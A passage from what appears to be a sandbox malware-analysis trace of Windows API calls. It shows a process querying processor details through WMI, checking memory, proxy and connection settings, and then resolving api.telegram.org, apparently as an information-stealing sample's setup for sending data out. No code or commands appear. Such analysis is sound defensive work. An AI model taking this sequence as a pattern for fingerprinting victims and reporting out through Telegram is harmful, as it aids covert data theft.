Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e9b4 | out: ppvObject=0x19e9b4*=0x0) returned 0x80004002 [0186.656] WbemLocator:IUnknown:AddRef (This=0x5b0f30) returned 0x3 [0186.656] WbemLocator:IUnknown:QueryInterface (in: This=0x5b0f30, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e714 | out: ppvObject=0x19e714*=0x0) returned 0x80004002 [0186.656] WbemLocator:IUnknown:QueryInterface (in: This=0x5b0f30, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e6c4 | out: ppvObject=0x19e6c4*=0x0) returned 0x80004002 [0186.656] WbemLocator:IUnknown:QueryInterface (in: This=0x5b0f30, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e6d0 | out: ppvObject=0x19e6d0*=0x5b0e8c) returned 0x0 [0186.657] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x5b0e8c, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e6d8 | out: pCid=0x19e6d8*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0186.657] WbemLocator:IUnknown:Release (This=0x5b0e8c) returned 0x3 [0186.657] CoGetContextToken (in: pToken=0x19e730 | out: pToken=0x19e730) returned 0x0 [0186.657] CoGetContextToken (in: pToken=0x19eb38 | out: pToken=0x19eb38) returned 0x0 [0186.657] WbemLocator:IUnknown:QueryInterface (in: This=0x5b0f30, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ebc4 | out: ppvObject=0x19ebc4*=0x5b0f14) returned 0x0 [0186.657] WbemLocator:IRpcOptions:Query (in: This=0x5b0f14, pPrx=0x5b0f30, dwProperty=2, pdwValue=0x19ebd0 | out: pdwValue=0x19ebd0) returned 0x80004002 [0186.657] WbemLocator:IUnknown:Release (This=0x5b0f14) returned 0x3 [0186.657] WbemLocator:IUnknown:Release (This=0x5b0f30) returned 0x2 [0186.657] CoGetContextToken (in: pToken=0x19f110 | out: pToken=0x19f110) returned 0x0 [0186.657] CoGetContextToken (in: pToken=0x19f070 | out: pToken=0x19f070) returned 0x0 [0186.657] WbemLocator:IUnknown:QueryInterface (in: This=0x5b0f30, riid=0x19f140*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x19f13c | out: ppvObject=0x19f13c*=0x599d30) returned 0x0 [0186.657] IUnknown:AddRef (This=0x599d30) returned 0x4 [0186.657] IUnknown:Release (This=0x599d30) returned 0x3 [0186.657] IUnknown:Release (This=0x599d30) returned 0x2 [0186.657] IUnknown:Release (This=0x59a500) returned 0x2 [0186.657] SysStringLen (param_1=0x0) returned 0x0 [0186.657] IEnumWbemClassObject:Reset (This=0x599d30) returned 0x0 [0186.658] CoTaskMemAlloc (cb=0x4) returned 0x54e728 [0186.658] IEnumWbemClassObject:Next (in: This=0x599d30, lTimeout=-1, uCount=0x1, apObjects=0x54e728, puReturned=0x2317b24 | out: apObjects=0x54e728*=0x59eab0, puReturned=0x2317b24*=0x1) returned 0x0 [0187.909] IUnknown:QueryInterface (in: This=0x59eab0, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e9c0 | out: ppvObject=0x19e9c0*=0x59eab0) returned 0x0 [0187.909] IUnknown:QueryInterface (in: This=0x59eab0, riid=0x69519c98*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e97c | out: ppvObject=0x19e97c*=0x0) returned 0x80004002 [0187.909] IUnknown:QueryInterface (in: This=0x59eab0, riid=0x69519bb4*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e79c | out: ppvObject=0x19e79c*=0x0) returned 0x80004002 [0187.909] IUnknown:QueryInterface (in: This=0x59eab0, riid=0x69519c88*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e574 | out: ppvObject=0x19e574*=0x0) returned 0x80004002 [0187.909] IUnknown:AddRef (This=0x59eab0) returned 0x3 [0187.909] IUnknown:QueryInterface (in: This=0x59eab0, riid=0x695198cc*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2d4 | out: ppvObject=0x19e2d4*=0x0) returned 0x80004002 [0187.909] IUnknown:QueryInterface (in: This=0x59eab0, riid=0x69519820*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e284 | out: ppvObject=0x19e284*=0x0) returned 0x80004002 [0187.909] IUnknown:QueryInterface (in: This=0x59eab0, riid=0x693ba540*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e290 | out: ppvObject=0x19e290*=0x59eab4) returned 0x0 [0187.910] IMarshal:GetUnmarshalClass (in: This=0x59eab4, riid=0x693ade2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e298 | out: pCid=0x19e298*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0187.910] IUnknown:Release (This=0x59eab4) returned 0x3 [0187.910] CoGetContextToken (in: pToken=0x19e2f0 | out: pToken=0x19e2f0) returned 0x0 [0187.910] CoGetContextToken (in: pToken=0x19e6f8 | out: pToken=0x19e6f8) returned 0x0 [0187.910] IUnknown:QueryInterface (in: This=0x59eab0, riid=0x69519b0c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e784 | out: ppvObject=0x19e784*=0x0) returned 0x80004002 [0187.910] IUnknown:Release (This=0x59eab0) returned 0x2 [0187.911] CoGetContextToken (in: pToken=0x19ecd0 | out: pToken=0x19ecd0) returned 0x0 [0187.911] CoGetContextToken (in: pToken=0x19ec30 | out: pToken=0x19ec30) returned 0x0 [0187.911] IUnknown:QueryInterface (in: This=0x59eab0, riid=0x19ed00*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19ecfc | out: ppvObject=0x19ecfc*=0x59eab0) returned 0x0 [0187.911] IUnknown:AddRef (This=0x59eab0) returned 0x4 [0187.911] IUnknown:Release (This=0x59eab0) returned 0x3 [0187.911] IUnknown:Release (This=0x59eab0) returned 0x2 [0187.911] CoTaskMemFree (pv=0x54e728) [0187.911] CoGetContextToken (in: pToken=0x19f048 | out: pToken=0x19f048) returned 0x0 [0187.911] IUnknown:AddRef (This=0x59eab0) returned 0x3 [0187.911] IWbemClassObject:Get (in: This=0x59eab0, wszName="__GENUS", lFlags=0, pVal=0x19f358*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f3d8*=0, plFlavor=0x19f3d4*=0 | out: pVal=0x19f358*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f3d8*=3, plFlavor=0x19f3d4*=64) returned 0x0 [0187.911] IWbemClassObject:Get (in: This=0x59eab0, wszName="__PATH", lFlags=0, pVal=0x19f33c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f3c0*=0, plFlavor=0x19f3bc*=0 | out: pVal=0x19f33c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Processor.DeviceID=\"CPU0\"", varVal2=0x0), pType=0x19f3c0*=8, plFlavor=0x19f3bc*=64) returned 0x0 [0187.911] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Processor.DeviceID=\"CPU0\"") returned 0x66 [0187.911] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Processor.DeviceID=\"CPU0\"") returned 0x66 [0187.911] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3e4 [0187.911] SetEvent (hEvent=0x3b4) returned 1 [0187.912] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x19f314*=0x3e4, lpdwindex=0x19f134 | out: lpdwindex=0x19f134) returned 0x0 [0187.917] CoGetContextToken (in: pToken=0x19f1e0 | out: pToken=0x19f1e0) returned 0x0 [0187.917] CoGetContextToken (in: pToken=0x19f140 | out: pToken=0x19f140) returned 0x0 [0187.917] WbemDefPath:IUnknown:QueryInterface (in: This=0x594660, riid=0x19f210*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f20c | out: ppvObject=0x19f20c*=0x594660) returned 0x0 [0187.917] WbemDefPath:IUnknown:AddRef (This=0x594660) returned 0x3 [0187.917] WbemDefPath:IUnknown:Release (This=0x594660) returned 0x2 [0187.917] WbemDefPath:IWbemPath:SetText (This=0x594660, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Processor.DeviceID=\"CPU0\"") returned 0x0 [0187.917] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594510, puCount=0x19f394 | out: puCount=0x19f394*=0x2) returned 0x0 [0187.917] WbemDefPath:IWbemPath:GetText (in: This=0x594510, lFlags=4, puBuffLength=0x19f390*=0x0, pszText=0x0 | out: puBuffLength=0x19f390*=0xf, pszText=0x0) returned 0x0 [0187.917] WbemDefPath:IWbemPath:GetText (in: This=0x594510, lFlags=4, puBuffLength=0x19f390*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f390*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0187.917] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594510, puCount=0x19f364 | out: puCount=0x19f364*=0x2) returned 0x0 [0187.917] WbemDefPath:IWbemPath:GetText (in: This=0x594510, lFlags=4, puBuffLength=0x19f360*=0x0, pszText=0x0 | out: puBuffLength=0x19f360*=0xf, pszText=0x0) returned 0x0 [0187.917] WbemDefPath:IWbemPath:GetText (in: This=0x594510, lFlags=4, puBuffLength=0x19f360*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f360*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0187.917] IWbemClassObject:Get (in: This=0x59eab0, wszName="Name", lFlags=0, pVal=0x19f360*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2318374*=0, plFlavor=0x2318378*=0 | out: pVal=0x19f360*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz", varVal2=0x0), pType=0x2318374*=8, plFlavor=0x2318378*=0) returned 0x0 [0187.917] SysStringByteLen (bstr="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 0x4e [0187.917] SysStringByteLen (bstr="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 0x4e [0187.918] IWbemClassObject:Get (in: This=0x59eab0, wszName="Name", lFlags=0, pVal=0x19f368*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2318374*=8, plFlavor=0x2318378*=0 | out: pVal=0x19f368*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz", varVal2=0x0), pType=0x2318374*=8, plFlavor=0x2318378*=0) returned 0x0 [0187.918] SysStringByteLen (bstr="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 0x4e [0187.918] SysStringByteLen (bstr="Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz") returned 0x4e [0187.918] CoTaskMemAlloc (cb=0x4) returned 0x54e5b8 [0187.918] IEnumWbemClassObject:Next (in: This=0x599d30, lTimeout=-1, uCount=0x1, apObjects=0x54e5b8, puReturned=0x2317b24 | out: apObjects=0x54e5b8*=0x0, puReturned=0x2317b24*=0x0) returned 0x1 [0187.920] CoTaskMemFree (pv=0x54e5b8) [0187.920] CoGetContextToken (in: pToken=0x19f288 | out: pToken=0x19f288) returned 0x0 [0187.920] WbemLocator:IUnknown:Release (This=0x5b0f30) returned 0x1 [0187.920] IUnknown:Release (This=0x599d30) returned 0x0 [0187.923] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x594510, puCount=0x19f3a0 | out: puCount=0x19f3a0*=0x2) returned 0x0 [0187.923] WbemDefPath:IWbemPath:GetText (in: This=0x594510, lFlags=4, puBuffLength=0x19f39c*=0x0, pszText=0x0 | out: puBuffLength=0x19f39c*=0xf, pszText=0x0) returned 0x0 [0187.923] WbemDefPath:IWbemPath:GetText (in: This=0x594510, lFlags=4, puBuffLength=0x19f39c*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f39c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0187.923] GlobalMemoryStatusEx (in: lpBuffer=0x2318900 | out: lpBuffer=0x2318900) returned 1 [0188.020] GetCurrentProcess () returned 0xffffffff [0188.020] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19efc4 | out: TokenHandle=0x19efc4*=0x3f4) returned 1 [0188.024] GetCurrentProcess () returned 0xffffffff [0188.024] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19efd4 | out: TokenHandle=0x19efd4*=0x3a4) returned 1 [0188.026] QueryPerformanceFrequency (in: lpFrequency=0x4a5dd8 | out: lpFrequency=0x4a5dd8*=100000000) returned 1 [0188.026] QueryPerformanceCounter (in: lpPerformanceCount=0x19f348 | out: lpPerformanceCount=0x19f348*=3628763447434) returned 1 [0188.029] GetCurrentProcess () returned 0xffffffff [0188.029] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19ef90 | out: TokenHandle=0x19ef90*=0x3dc) returned 1 [0188.031] GetCurrentProcess () returned 0xffffffff [0188.031] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19efa0 | out: TokenHandle=0x19efa0*=0x3e0) returned 1 [0188.047] GetCurrentProcess () returned 0xffffffff [0188.047] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19efa4 | out: TokenHandle=0x19efa4*=0x430) returned 1 [0188.049] GetCurrentProcess () returned 0xffffffff [0188.049] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19efb4 | out: TokenHandle=0x19efb4*=0x244) returned 1 [0188.053] GetCurrentProcess () returned 0xffffffff [0188.053] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19f22c | out: TokenHandle=0x19f22c*=0x434) returned 1 [0188.079] CoTaskMemAlloc (cb=0xcc0) returned 0x5202050 [0188.079] RasEnumConnectionsW (in: param_1=0x5202050, param_2=0x19f23c, param_3=0x19f240 | out: param_1=0x5202050, param_2=0x19f23c, param_3=0x19f240) returned 0x0 [0188.153] CoTaskMemFree (pv=0x5202050) [0188.158] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x19f024 | out: lpWSAData=0x19f024) returned 0 [0188.165] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x514 [0188.182] setsockopt (s=0x514, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0188.182] closesocket (s=0x514) returned 0 [0188.182] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x514 [0188.183] setsockopt (s=0x514, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0188.184] closesocket (s=0x514) returned 0 [0188.184] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x514 [0188.184] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x518 [0188.185] ioctlsocket (in: s=0x514, cmd=-2147195266, argp=0x19f244 | out: argp=0x19f244) returned 0 [0188.185] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x51c [0188.185] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x520 [0188.185] ioctlsocket (in: s=0x51c, cmd=-2147195266, argp=0x19f244 | out: argp=0x19f244) returned 0 [0188.186] WSAIoctl (in: s=0x514, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x19f22c, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x19f22c, lpOverlapped=0x0) returned -1 [0188.187] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x19ef5c, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0188.188] WSAEventSelect (s=0x514, hEventObject=0x518, lNetworkEvents=512) returned 0 [0188.188] WSAIoctl (in: s=0x51c, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x19f22c, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x19f22c, lpOverlapped=0x0) returned -1 [0188.188] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x19ef5c, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0188.188] WSAEventSelect (s=0x51c, hEventObject=0x520, lNetworkEvents=512) returned 0 [0188.188] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x524 [0188.189] RasConnectionNotificationW (param_1=0xffffffff, param_2=0x524, param_3=0x3) returned 0x0 [0188.196] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x19f258 | out: phkResult=0x19f258*=0x53c) returned 0x0 [0188.197] RegOpenKeyExW (in: hKey=0x53c, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f20c | out: phkResult=0x19f20c*=0x540) returned 0x0 [0188.197] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x544 [0188.197] RegNotifyChangeKeyValue (hKey=0x540, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x544, fAsynchronous=1) returned 0x0 [0188.198] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f210 | out: phkResult=0x19f210*=0x548) returned 0x0 [0188.198] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x54c [0188.198] RegNotifyChangeKeyValue (hKey=0x548, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x54c, fAsynchronous=1) returned 0x0 [0188.199] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f210 | out: phkResult=0x19f210*=0x550) returned 0x0 [0188.199] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x554 [0188.199] RegNotifyChangeKeyValue (hKey=0x550, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x554, fAsynchronous=1) returned 0x0 [0188.199] GetCurrentProcess () returned 0xffffffff [0188.199] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19f200 | out: TokenHandle=0x19f200*=0x558) returned 1 [0188.203] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x19eb08 | out: phkResult=0x19eb08*=0x55c) returned 0x0 [0188.203] RegQueryValueExW (in: hKey=0x55c, lpValueName="LegacyWPADSupport", lpReserved=0x0, lpType=0x19eb24, lpData=0x0, lpcbData=0x19eb20*=0x0 | out: lpType=0x19eb24*=0x0, lpData=0x0, lpcbData=0x19eb20*=0x0) returned 0x2 [0188.203] RegCloseKey (hKey=0x55c) returned 0x0 [0188.216] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x517730 [0188.235] WinHttpSetTimeouts (hInternet=0x517730, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1 [0188.236] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x19f20c | out: pProxyConfig=0x19f20c) returned 1 [0188.268] CoTaskMemAlloc (cb=0x20c) returned 0x5178b8 [0188.268] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.HttpWebRequest_Disabled", lpBuffer=0x5178b8, nSize=0x104 | out: lpBuffer="") returned 0x0 [0188.268] CoTaskMemFree (pv=0x5178b8) [0188.268] CoTaskMemAlloc (cb=0x20c) returned 0x5178b8 [0188.268] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.HttpWebRequest_MinCount", lpBuffer=0x5178b8, nSize=0x104 | out: lpBuffer="") returned 0x0 [0188.268] CoTaskMemFree (pv=0x5178b8) [0188.275] EtwEventRegister () returned 0x0 [0188.275] EtwEventSetInformation () returned 0x0 [0188.278] GetCurrentProcess () returned 0xffffffff [0188.278] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19ef6c | out: TokenHandle=0x19ef6c*=0x5a0) returned 1 [0188.279] GetCurrentProcess () returned 0xffffffff [0188.280] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19ef7c | out: TokenHandle=0x19ef7c*=0x5a4) returned 1 [0188.295] SystemFunction041 (in: Memory=0x56f81c, MemorySize=0x10, OptionFlags=0x0 | out: Memory=0x56f81c) returned 0x0 [0188.297] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x19f17c*=0x524, lpdwindex=0x19ef9c | out: lpdwindex=0x19ef9c) returned 0x80010115 [0188.297] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x19f15c*=0x518, lpdwindex=0x19ef7c | out: lpdwindex=0x19ef7c) returned 0x80010115 [0188.298] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x19f15c*=0x520, lpdwindex=0x19ef7c | out: lpdwindex=0x19ef7c) returned 0x80010115 [0188.298] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x19f1b0*=0x544, lpdwindex=0x19efcc | out: lpdwindex=0x19efcc) returned 0x80010115 [0188.298] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x19f1b0*=0x54c, lpdwindex=0x19efcc | out: lpdwindex=0x19efcc) returned 0x80010115 [0188.299] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x19f1b0*=0x554, lpdwindex=0x19efcc | out: lpdwindex=0x19efcc) returned 0x80010115 [0188.302] GetCurrentProcess () returned 0xffffffff [0188.302] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19eeec | out: TokenHandle=0x19eeec*=0x5a8) returned 1 [0188.303] GetCurrentProcess () returned 0xffffffff [0188.303] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19eefc | out: TokenHandle=0x19eefc*=0x5ac) returned 1 [0188.303] SetEvent (hEvent=0x230) returned 1 [0188.312] SetEvent (hEvent=0x230) returned 1 [0188.313] GetACP () returned 0x4e4 [0188.328] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x19f1c8 | out: pFixedInfo=0x0, pOutBufLen=0x19f1c8) returned 0x6f [0188.365] LocalAlloc (uFlags=0x0, uBytes=0x248) returned 0x5851f0 [0188.365] GetNetworkParams (in: pFixedInfo=0x5851f0, pOutBufLen=0x19f1c8 | out: pFixedInfo=0x5851f0, pOutBufLen=0x19f1c8) returned 0x0 [0188.378] LocalFree (hMem=0x5851f0) returned 0x0 [0188.380] CoTaskMemAlloc (cb=0x20c) returned 0x5205c48 [0188.380] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.Connection_Disabled", lpBuffer=0x5205c48, nSize=0x104 | out: lpBuffer="") returned 0x0 [0188.380] CoTaskMemFree (pv=0x5205c48) [0188.380] CoTaskMemAlloc (cb=0x20c) returned 0x5205c48 [0188.380] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.Connection_MinCount", lpBuffer=0x5205c48, nSize=0x104 | out: lpBuffer="") returned 0x0 [0188.380] CoTaskMemFree (pv=0x5205c48) [0188.384] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x604 [0188.384] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x5dc [0188.385] GetAddrInfoW (in: pNodeName="api.telegram.org", pServiceName=0x0, pHints=0x19f0b0*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f058 | out: ppResult=0x19f058*=0x5899a8*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="api.telegram.org", ai_addr=0x5ccdf0*(sa_family=2, sin_port=0x0, sin_addr="149.154.167.220"), ai_next=0x0)) returned 0 [0188.411] FreeAddrInfoW (pAddrInfo=0x5899a8*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="api.telegram.org", ai_addr=0x5ccdf0*(sa_family=2, sin_port=0x0, sin_addr="149.154.167.220"), ai_next=0x0)) [0188.412] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x60c [0188.412] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x614 [0188.412] ioctlsocket (in: 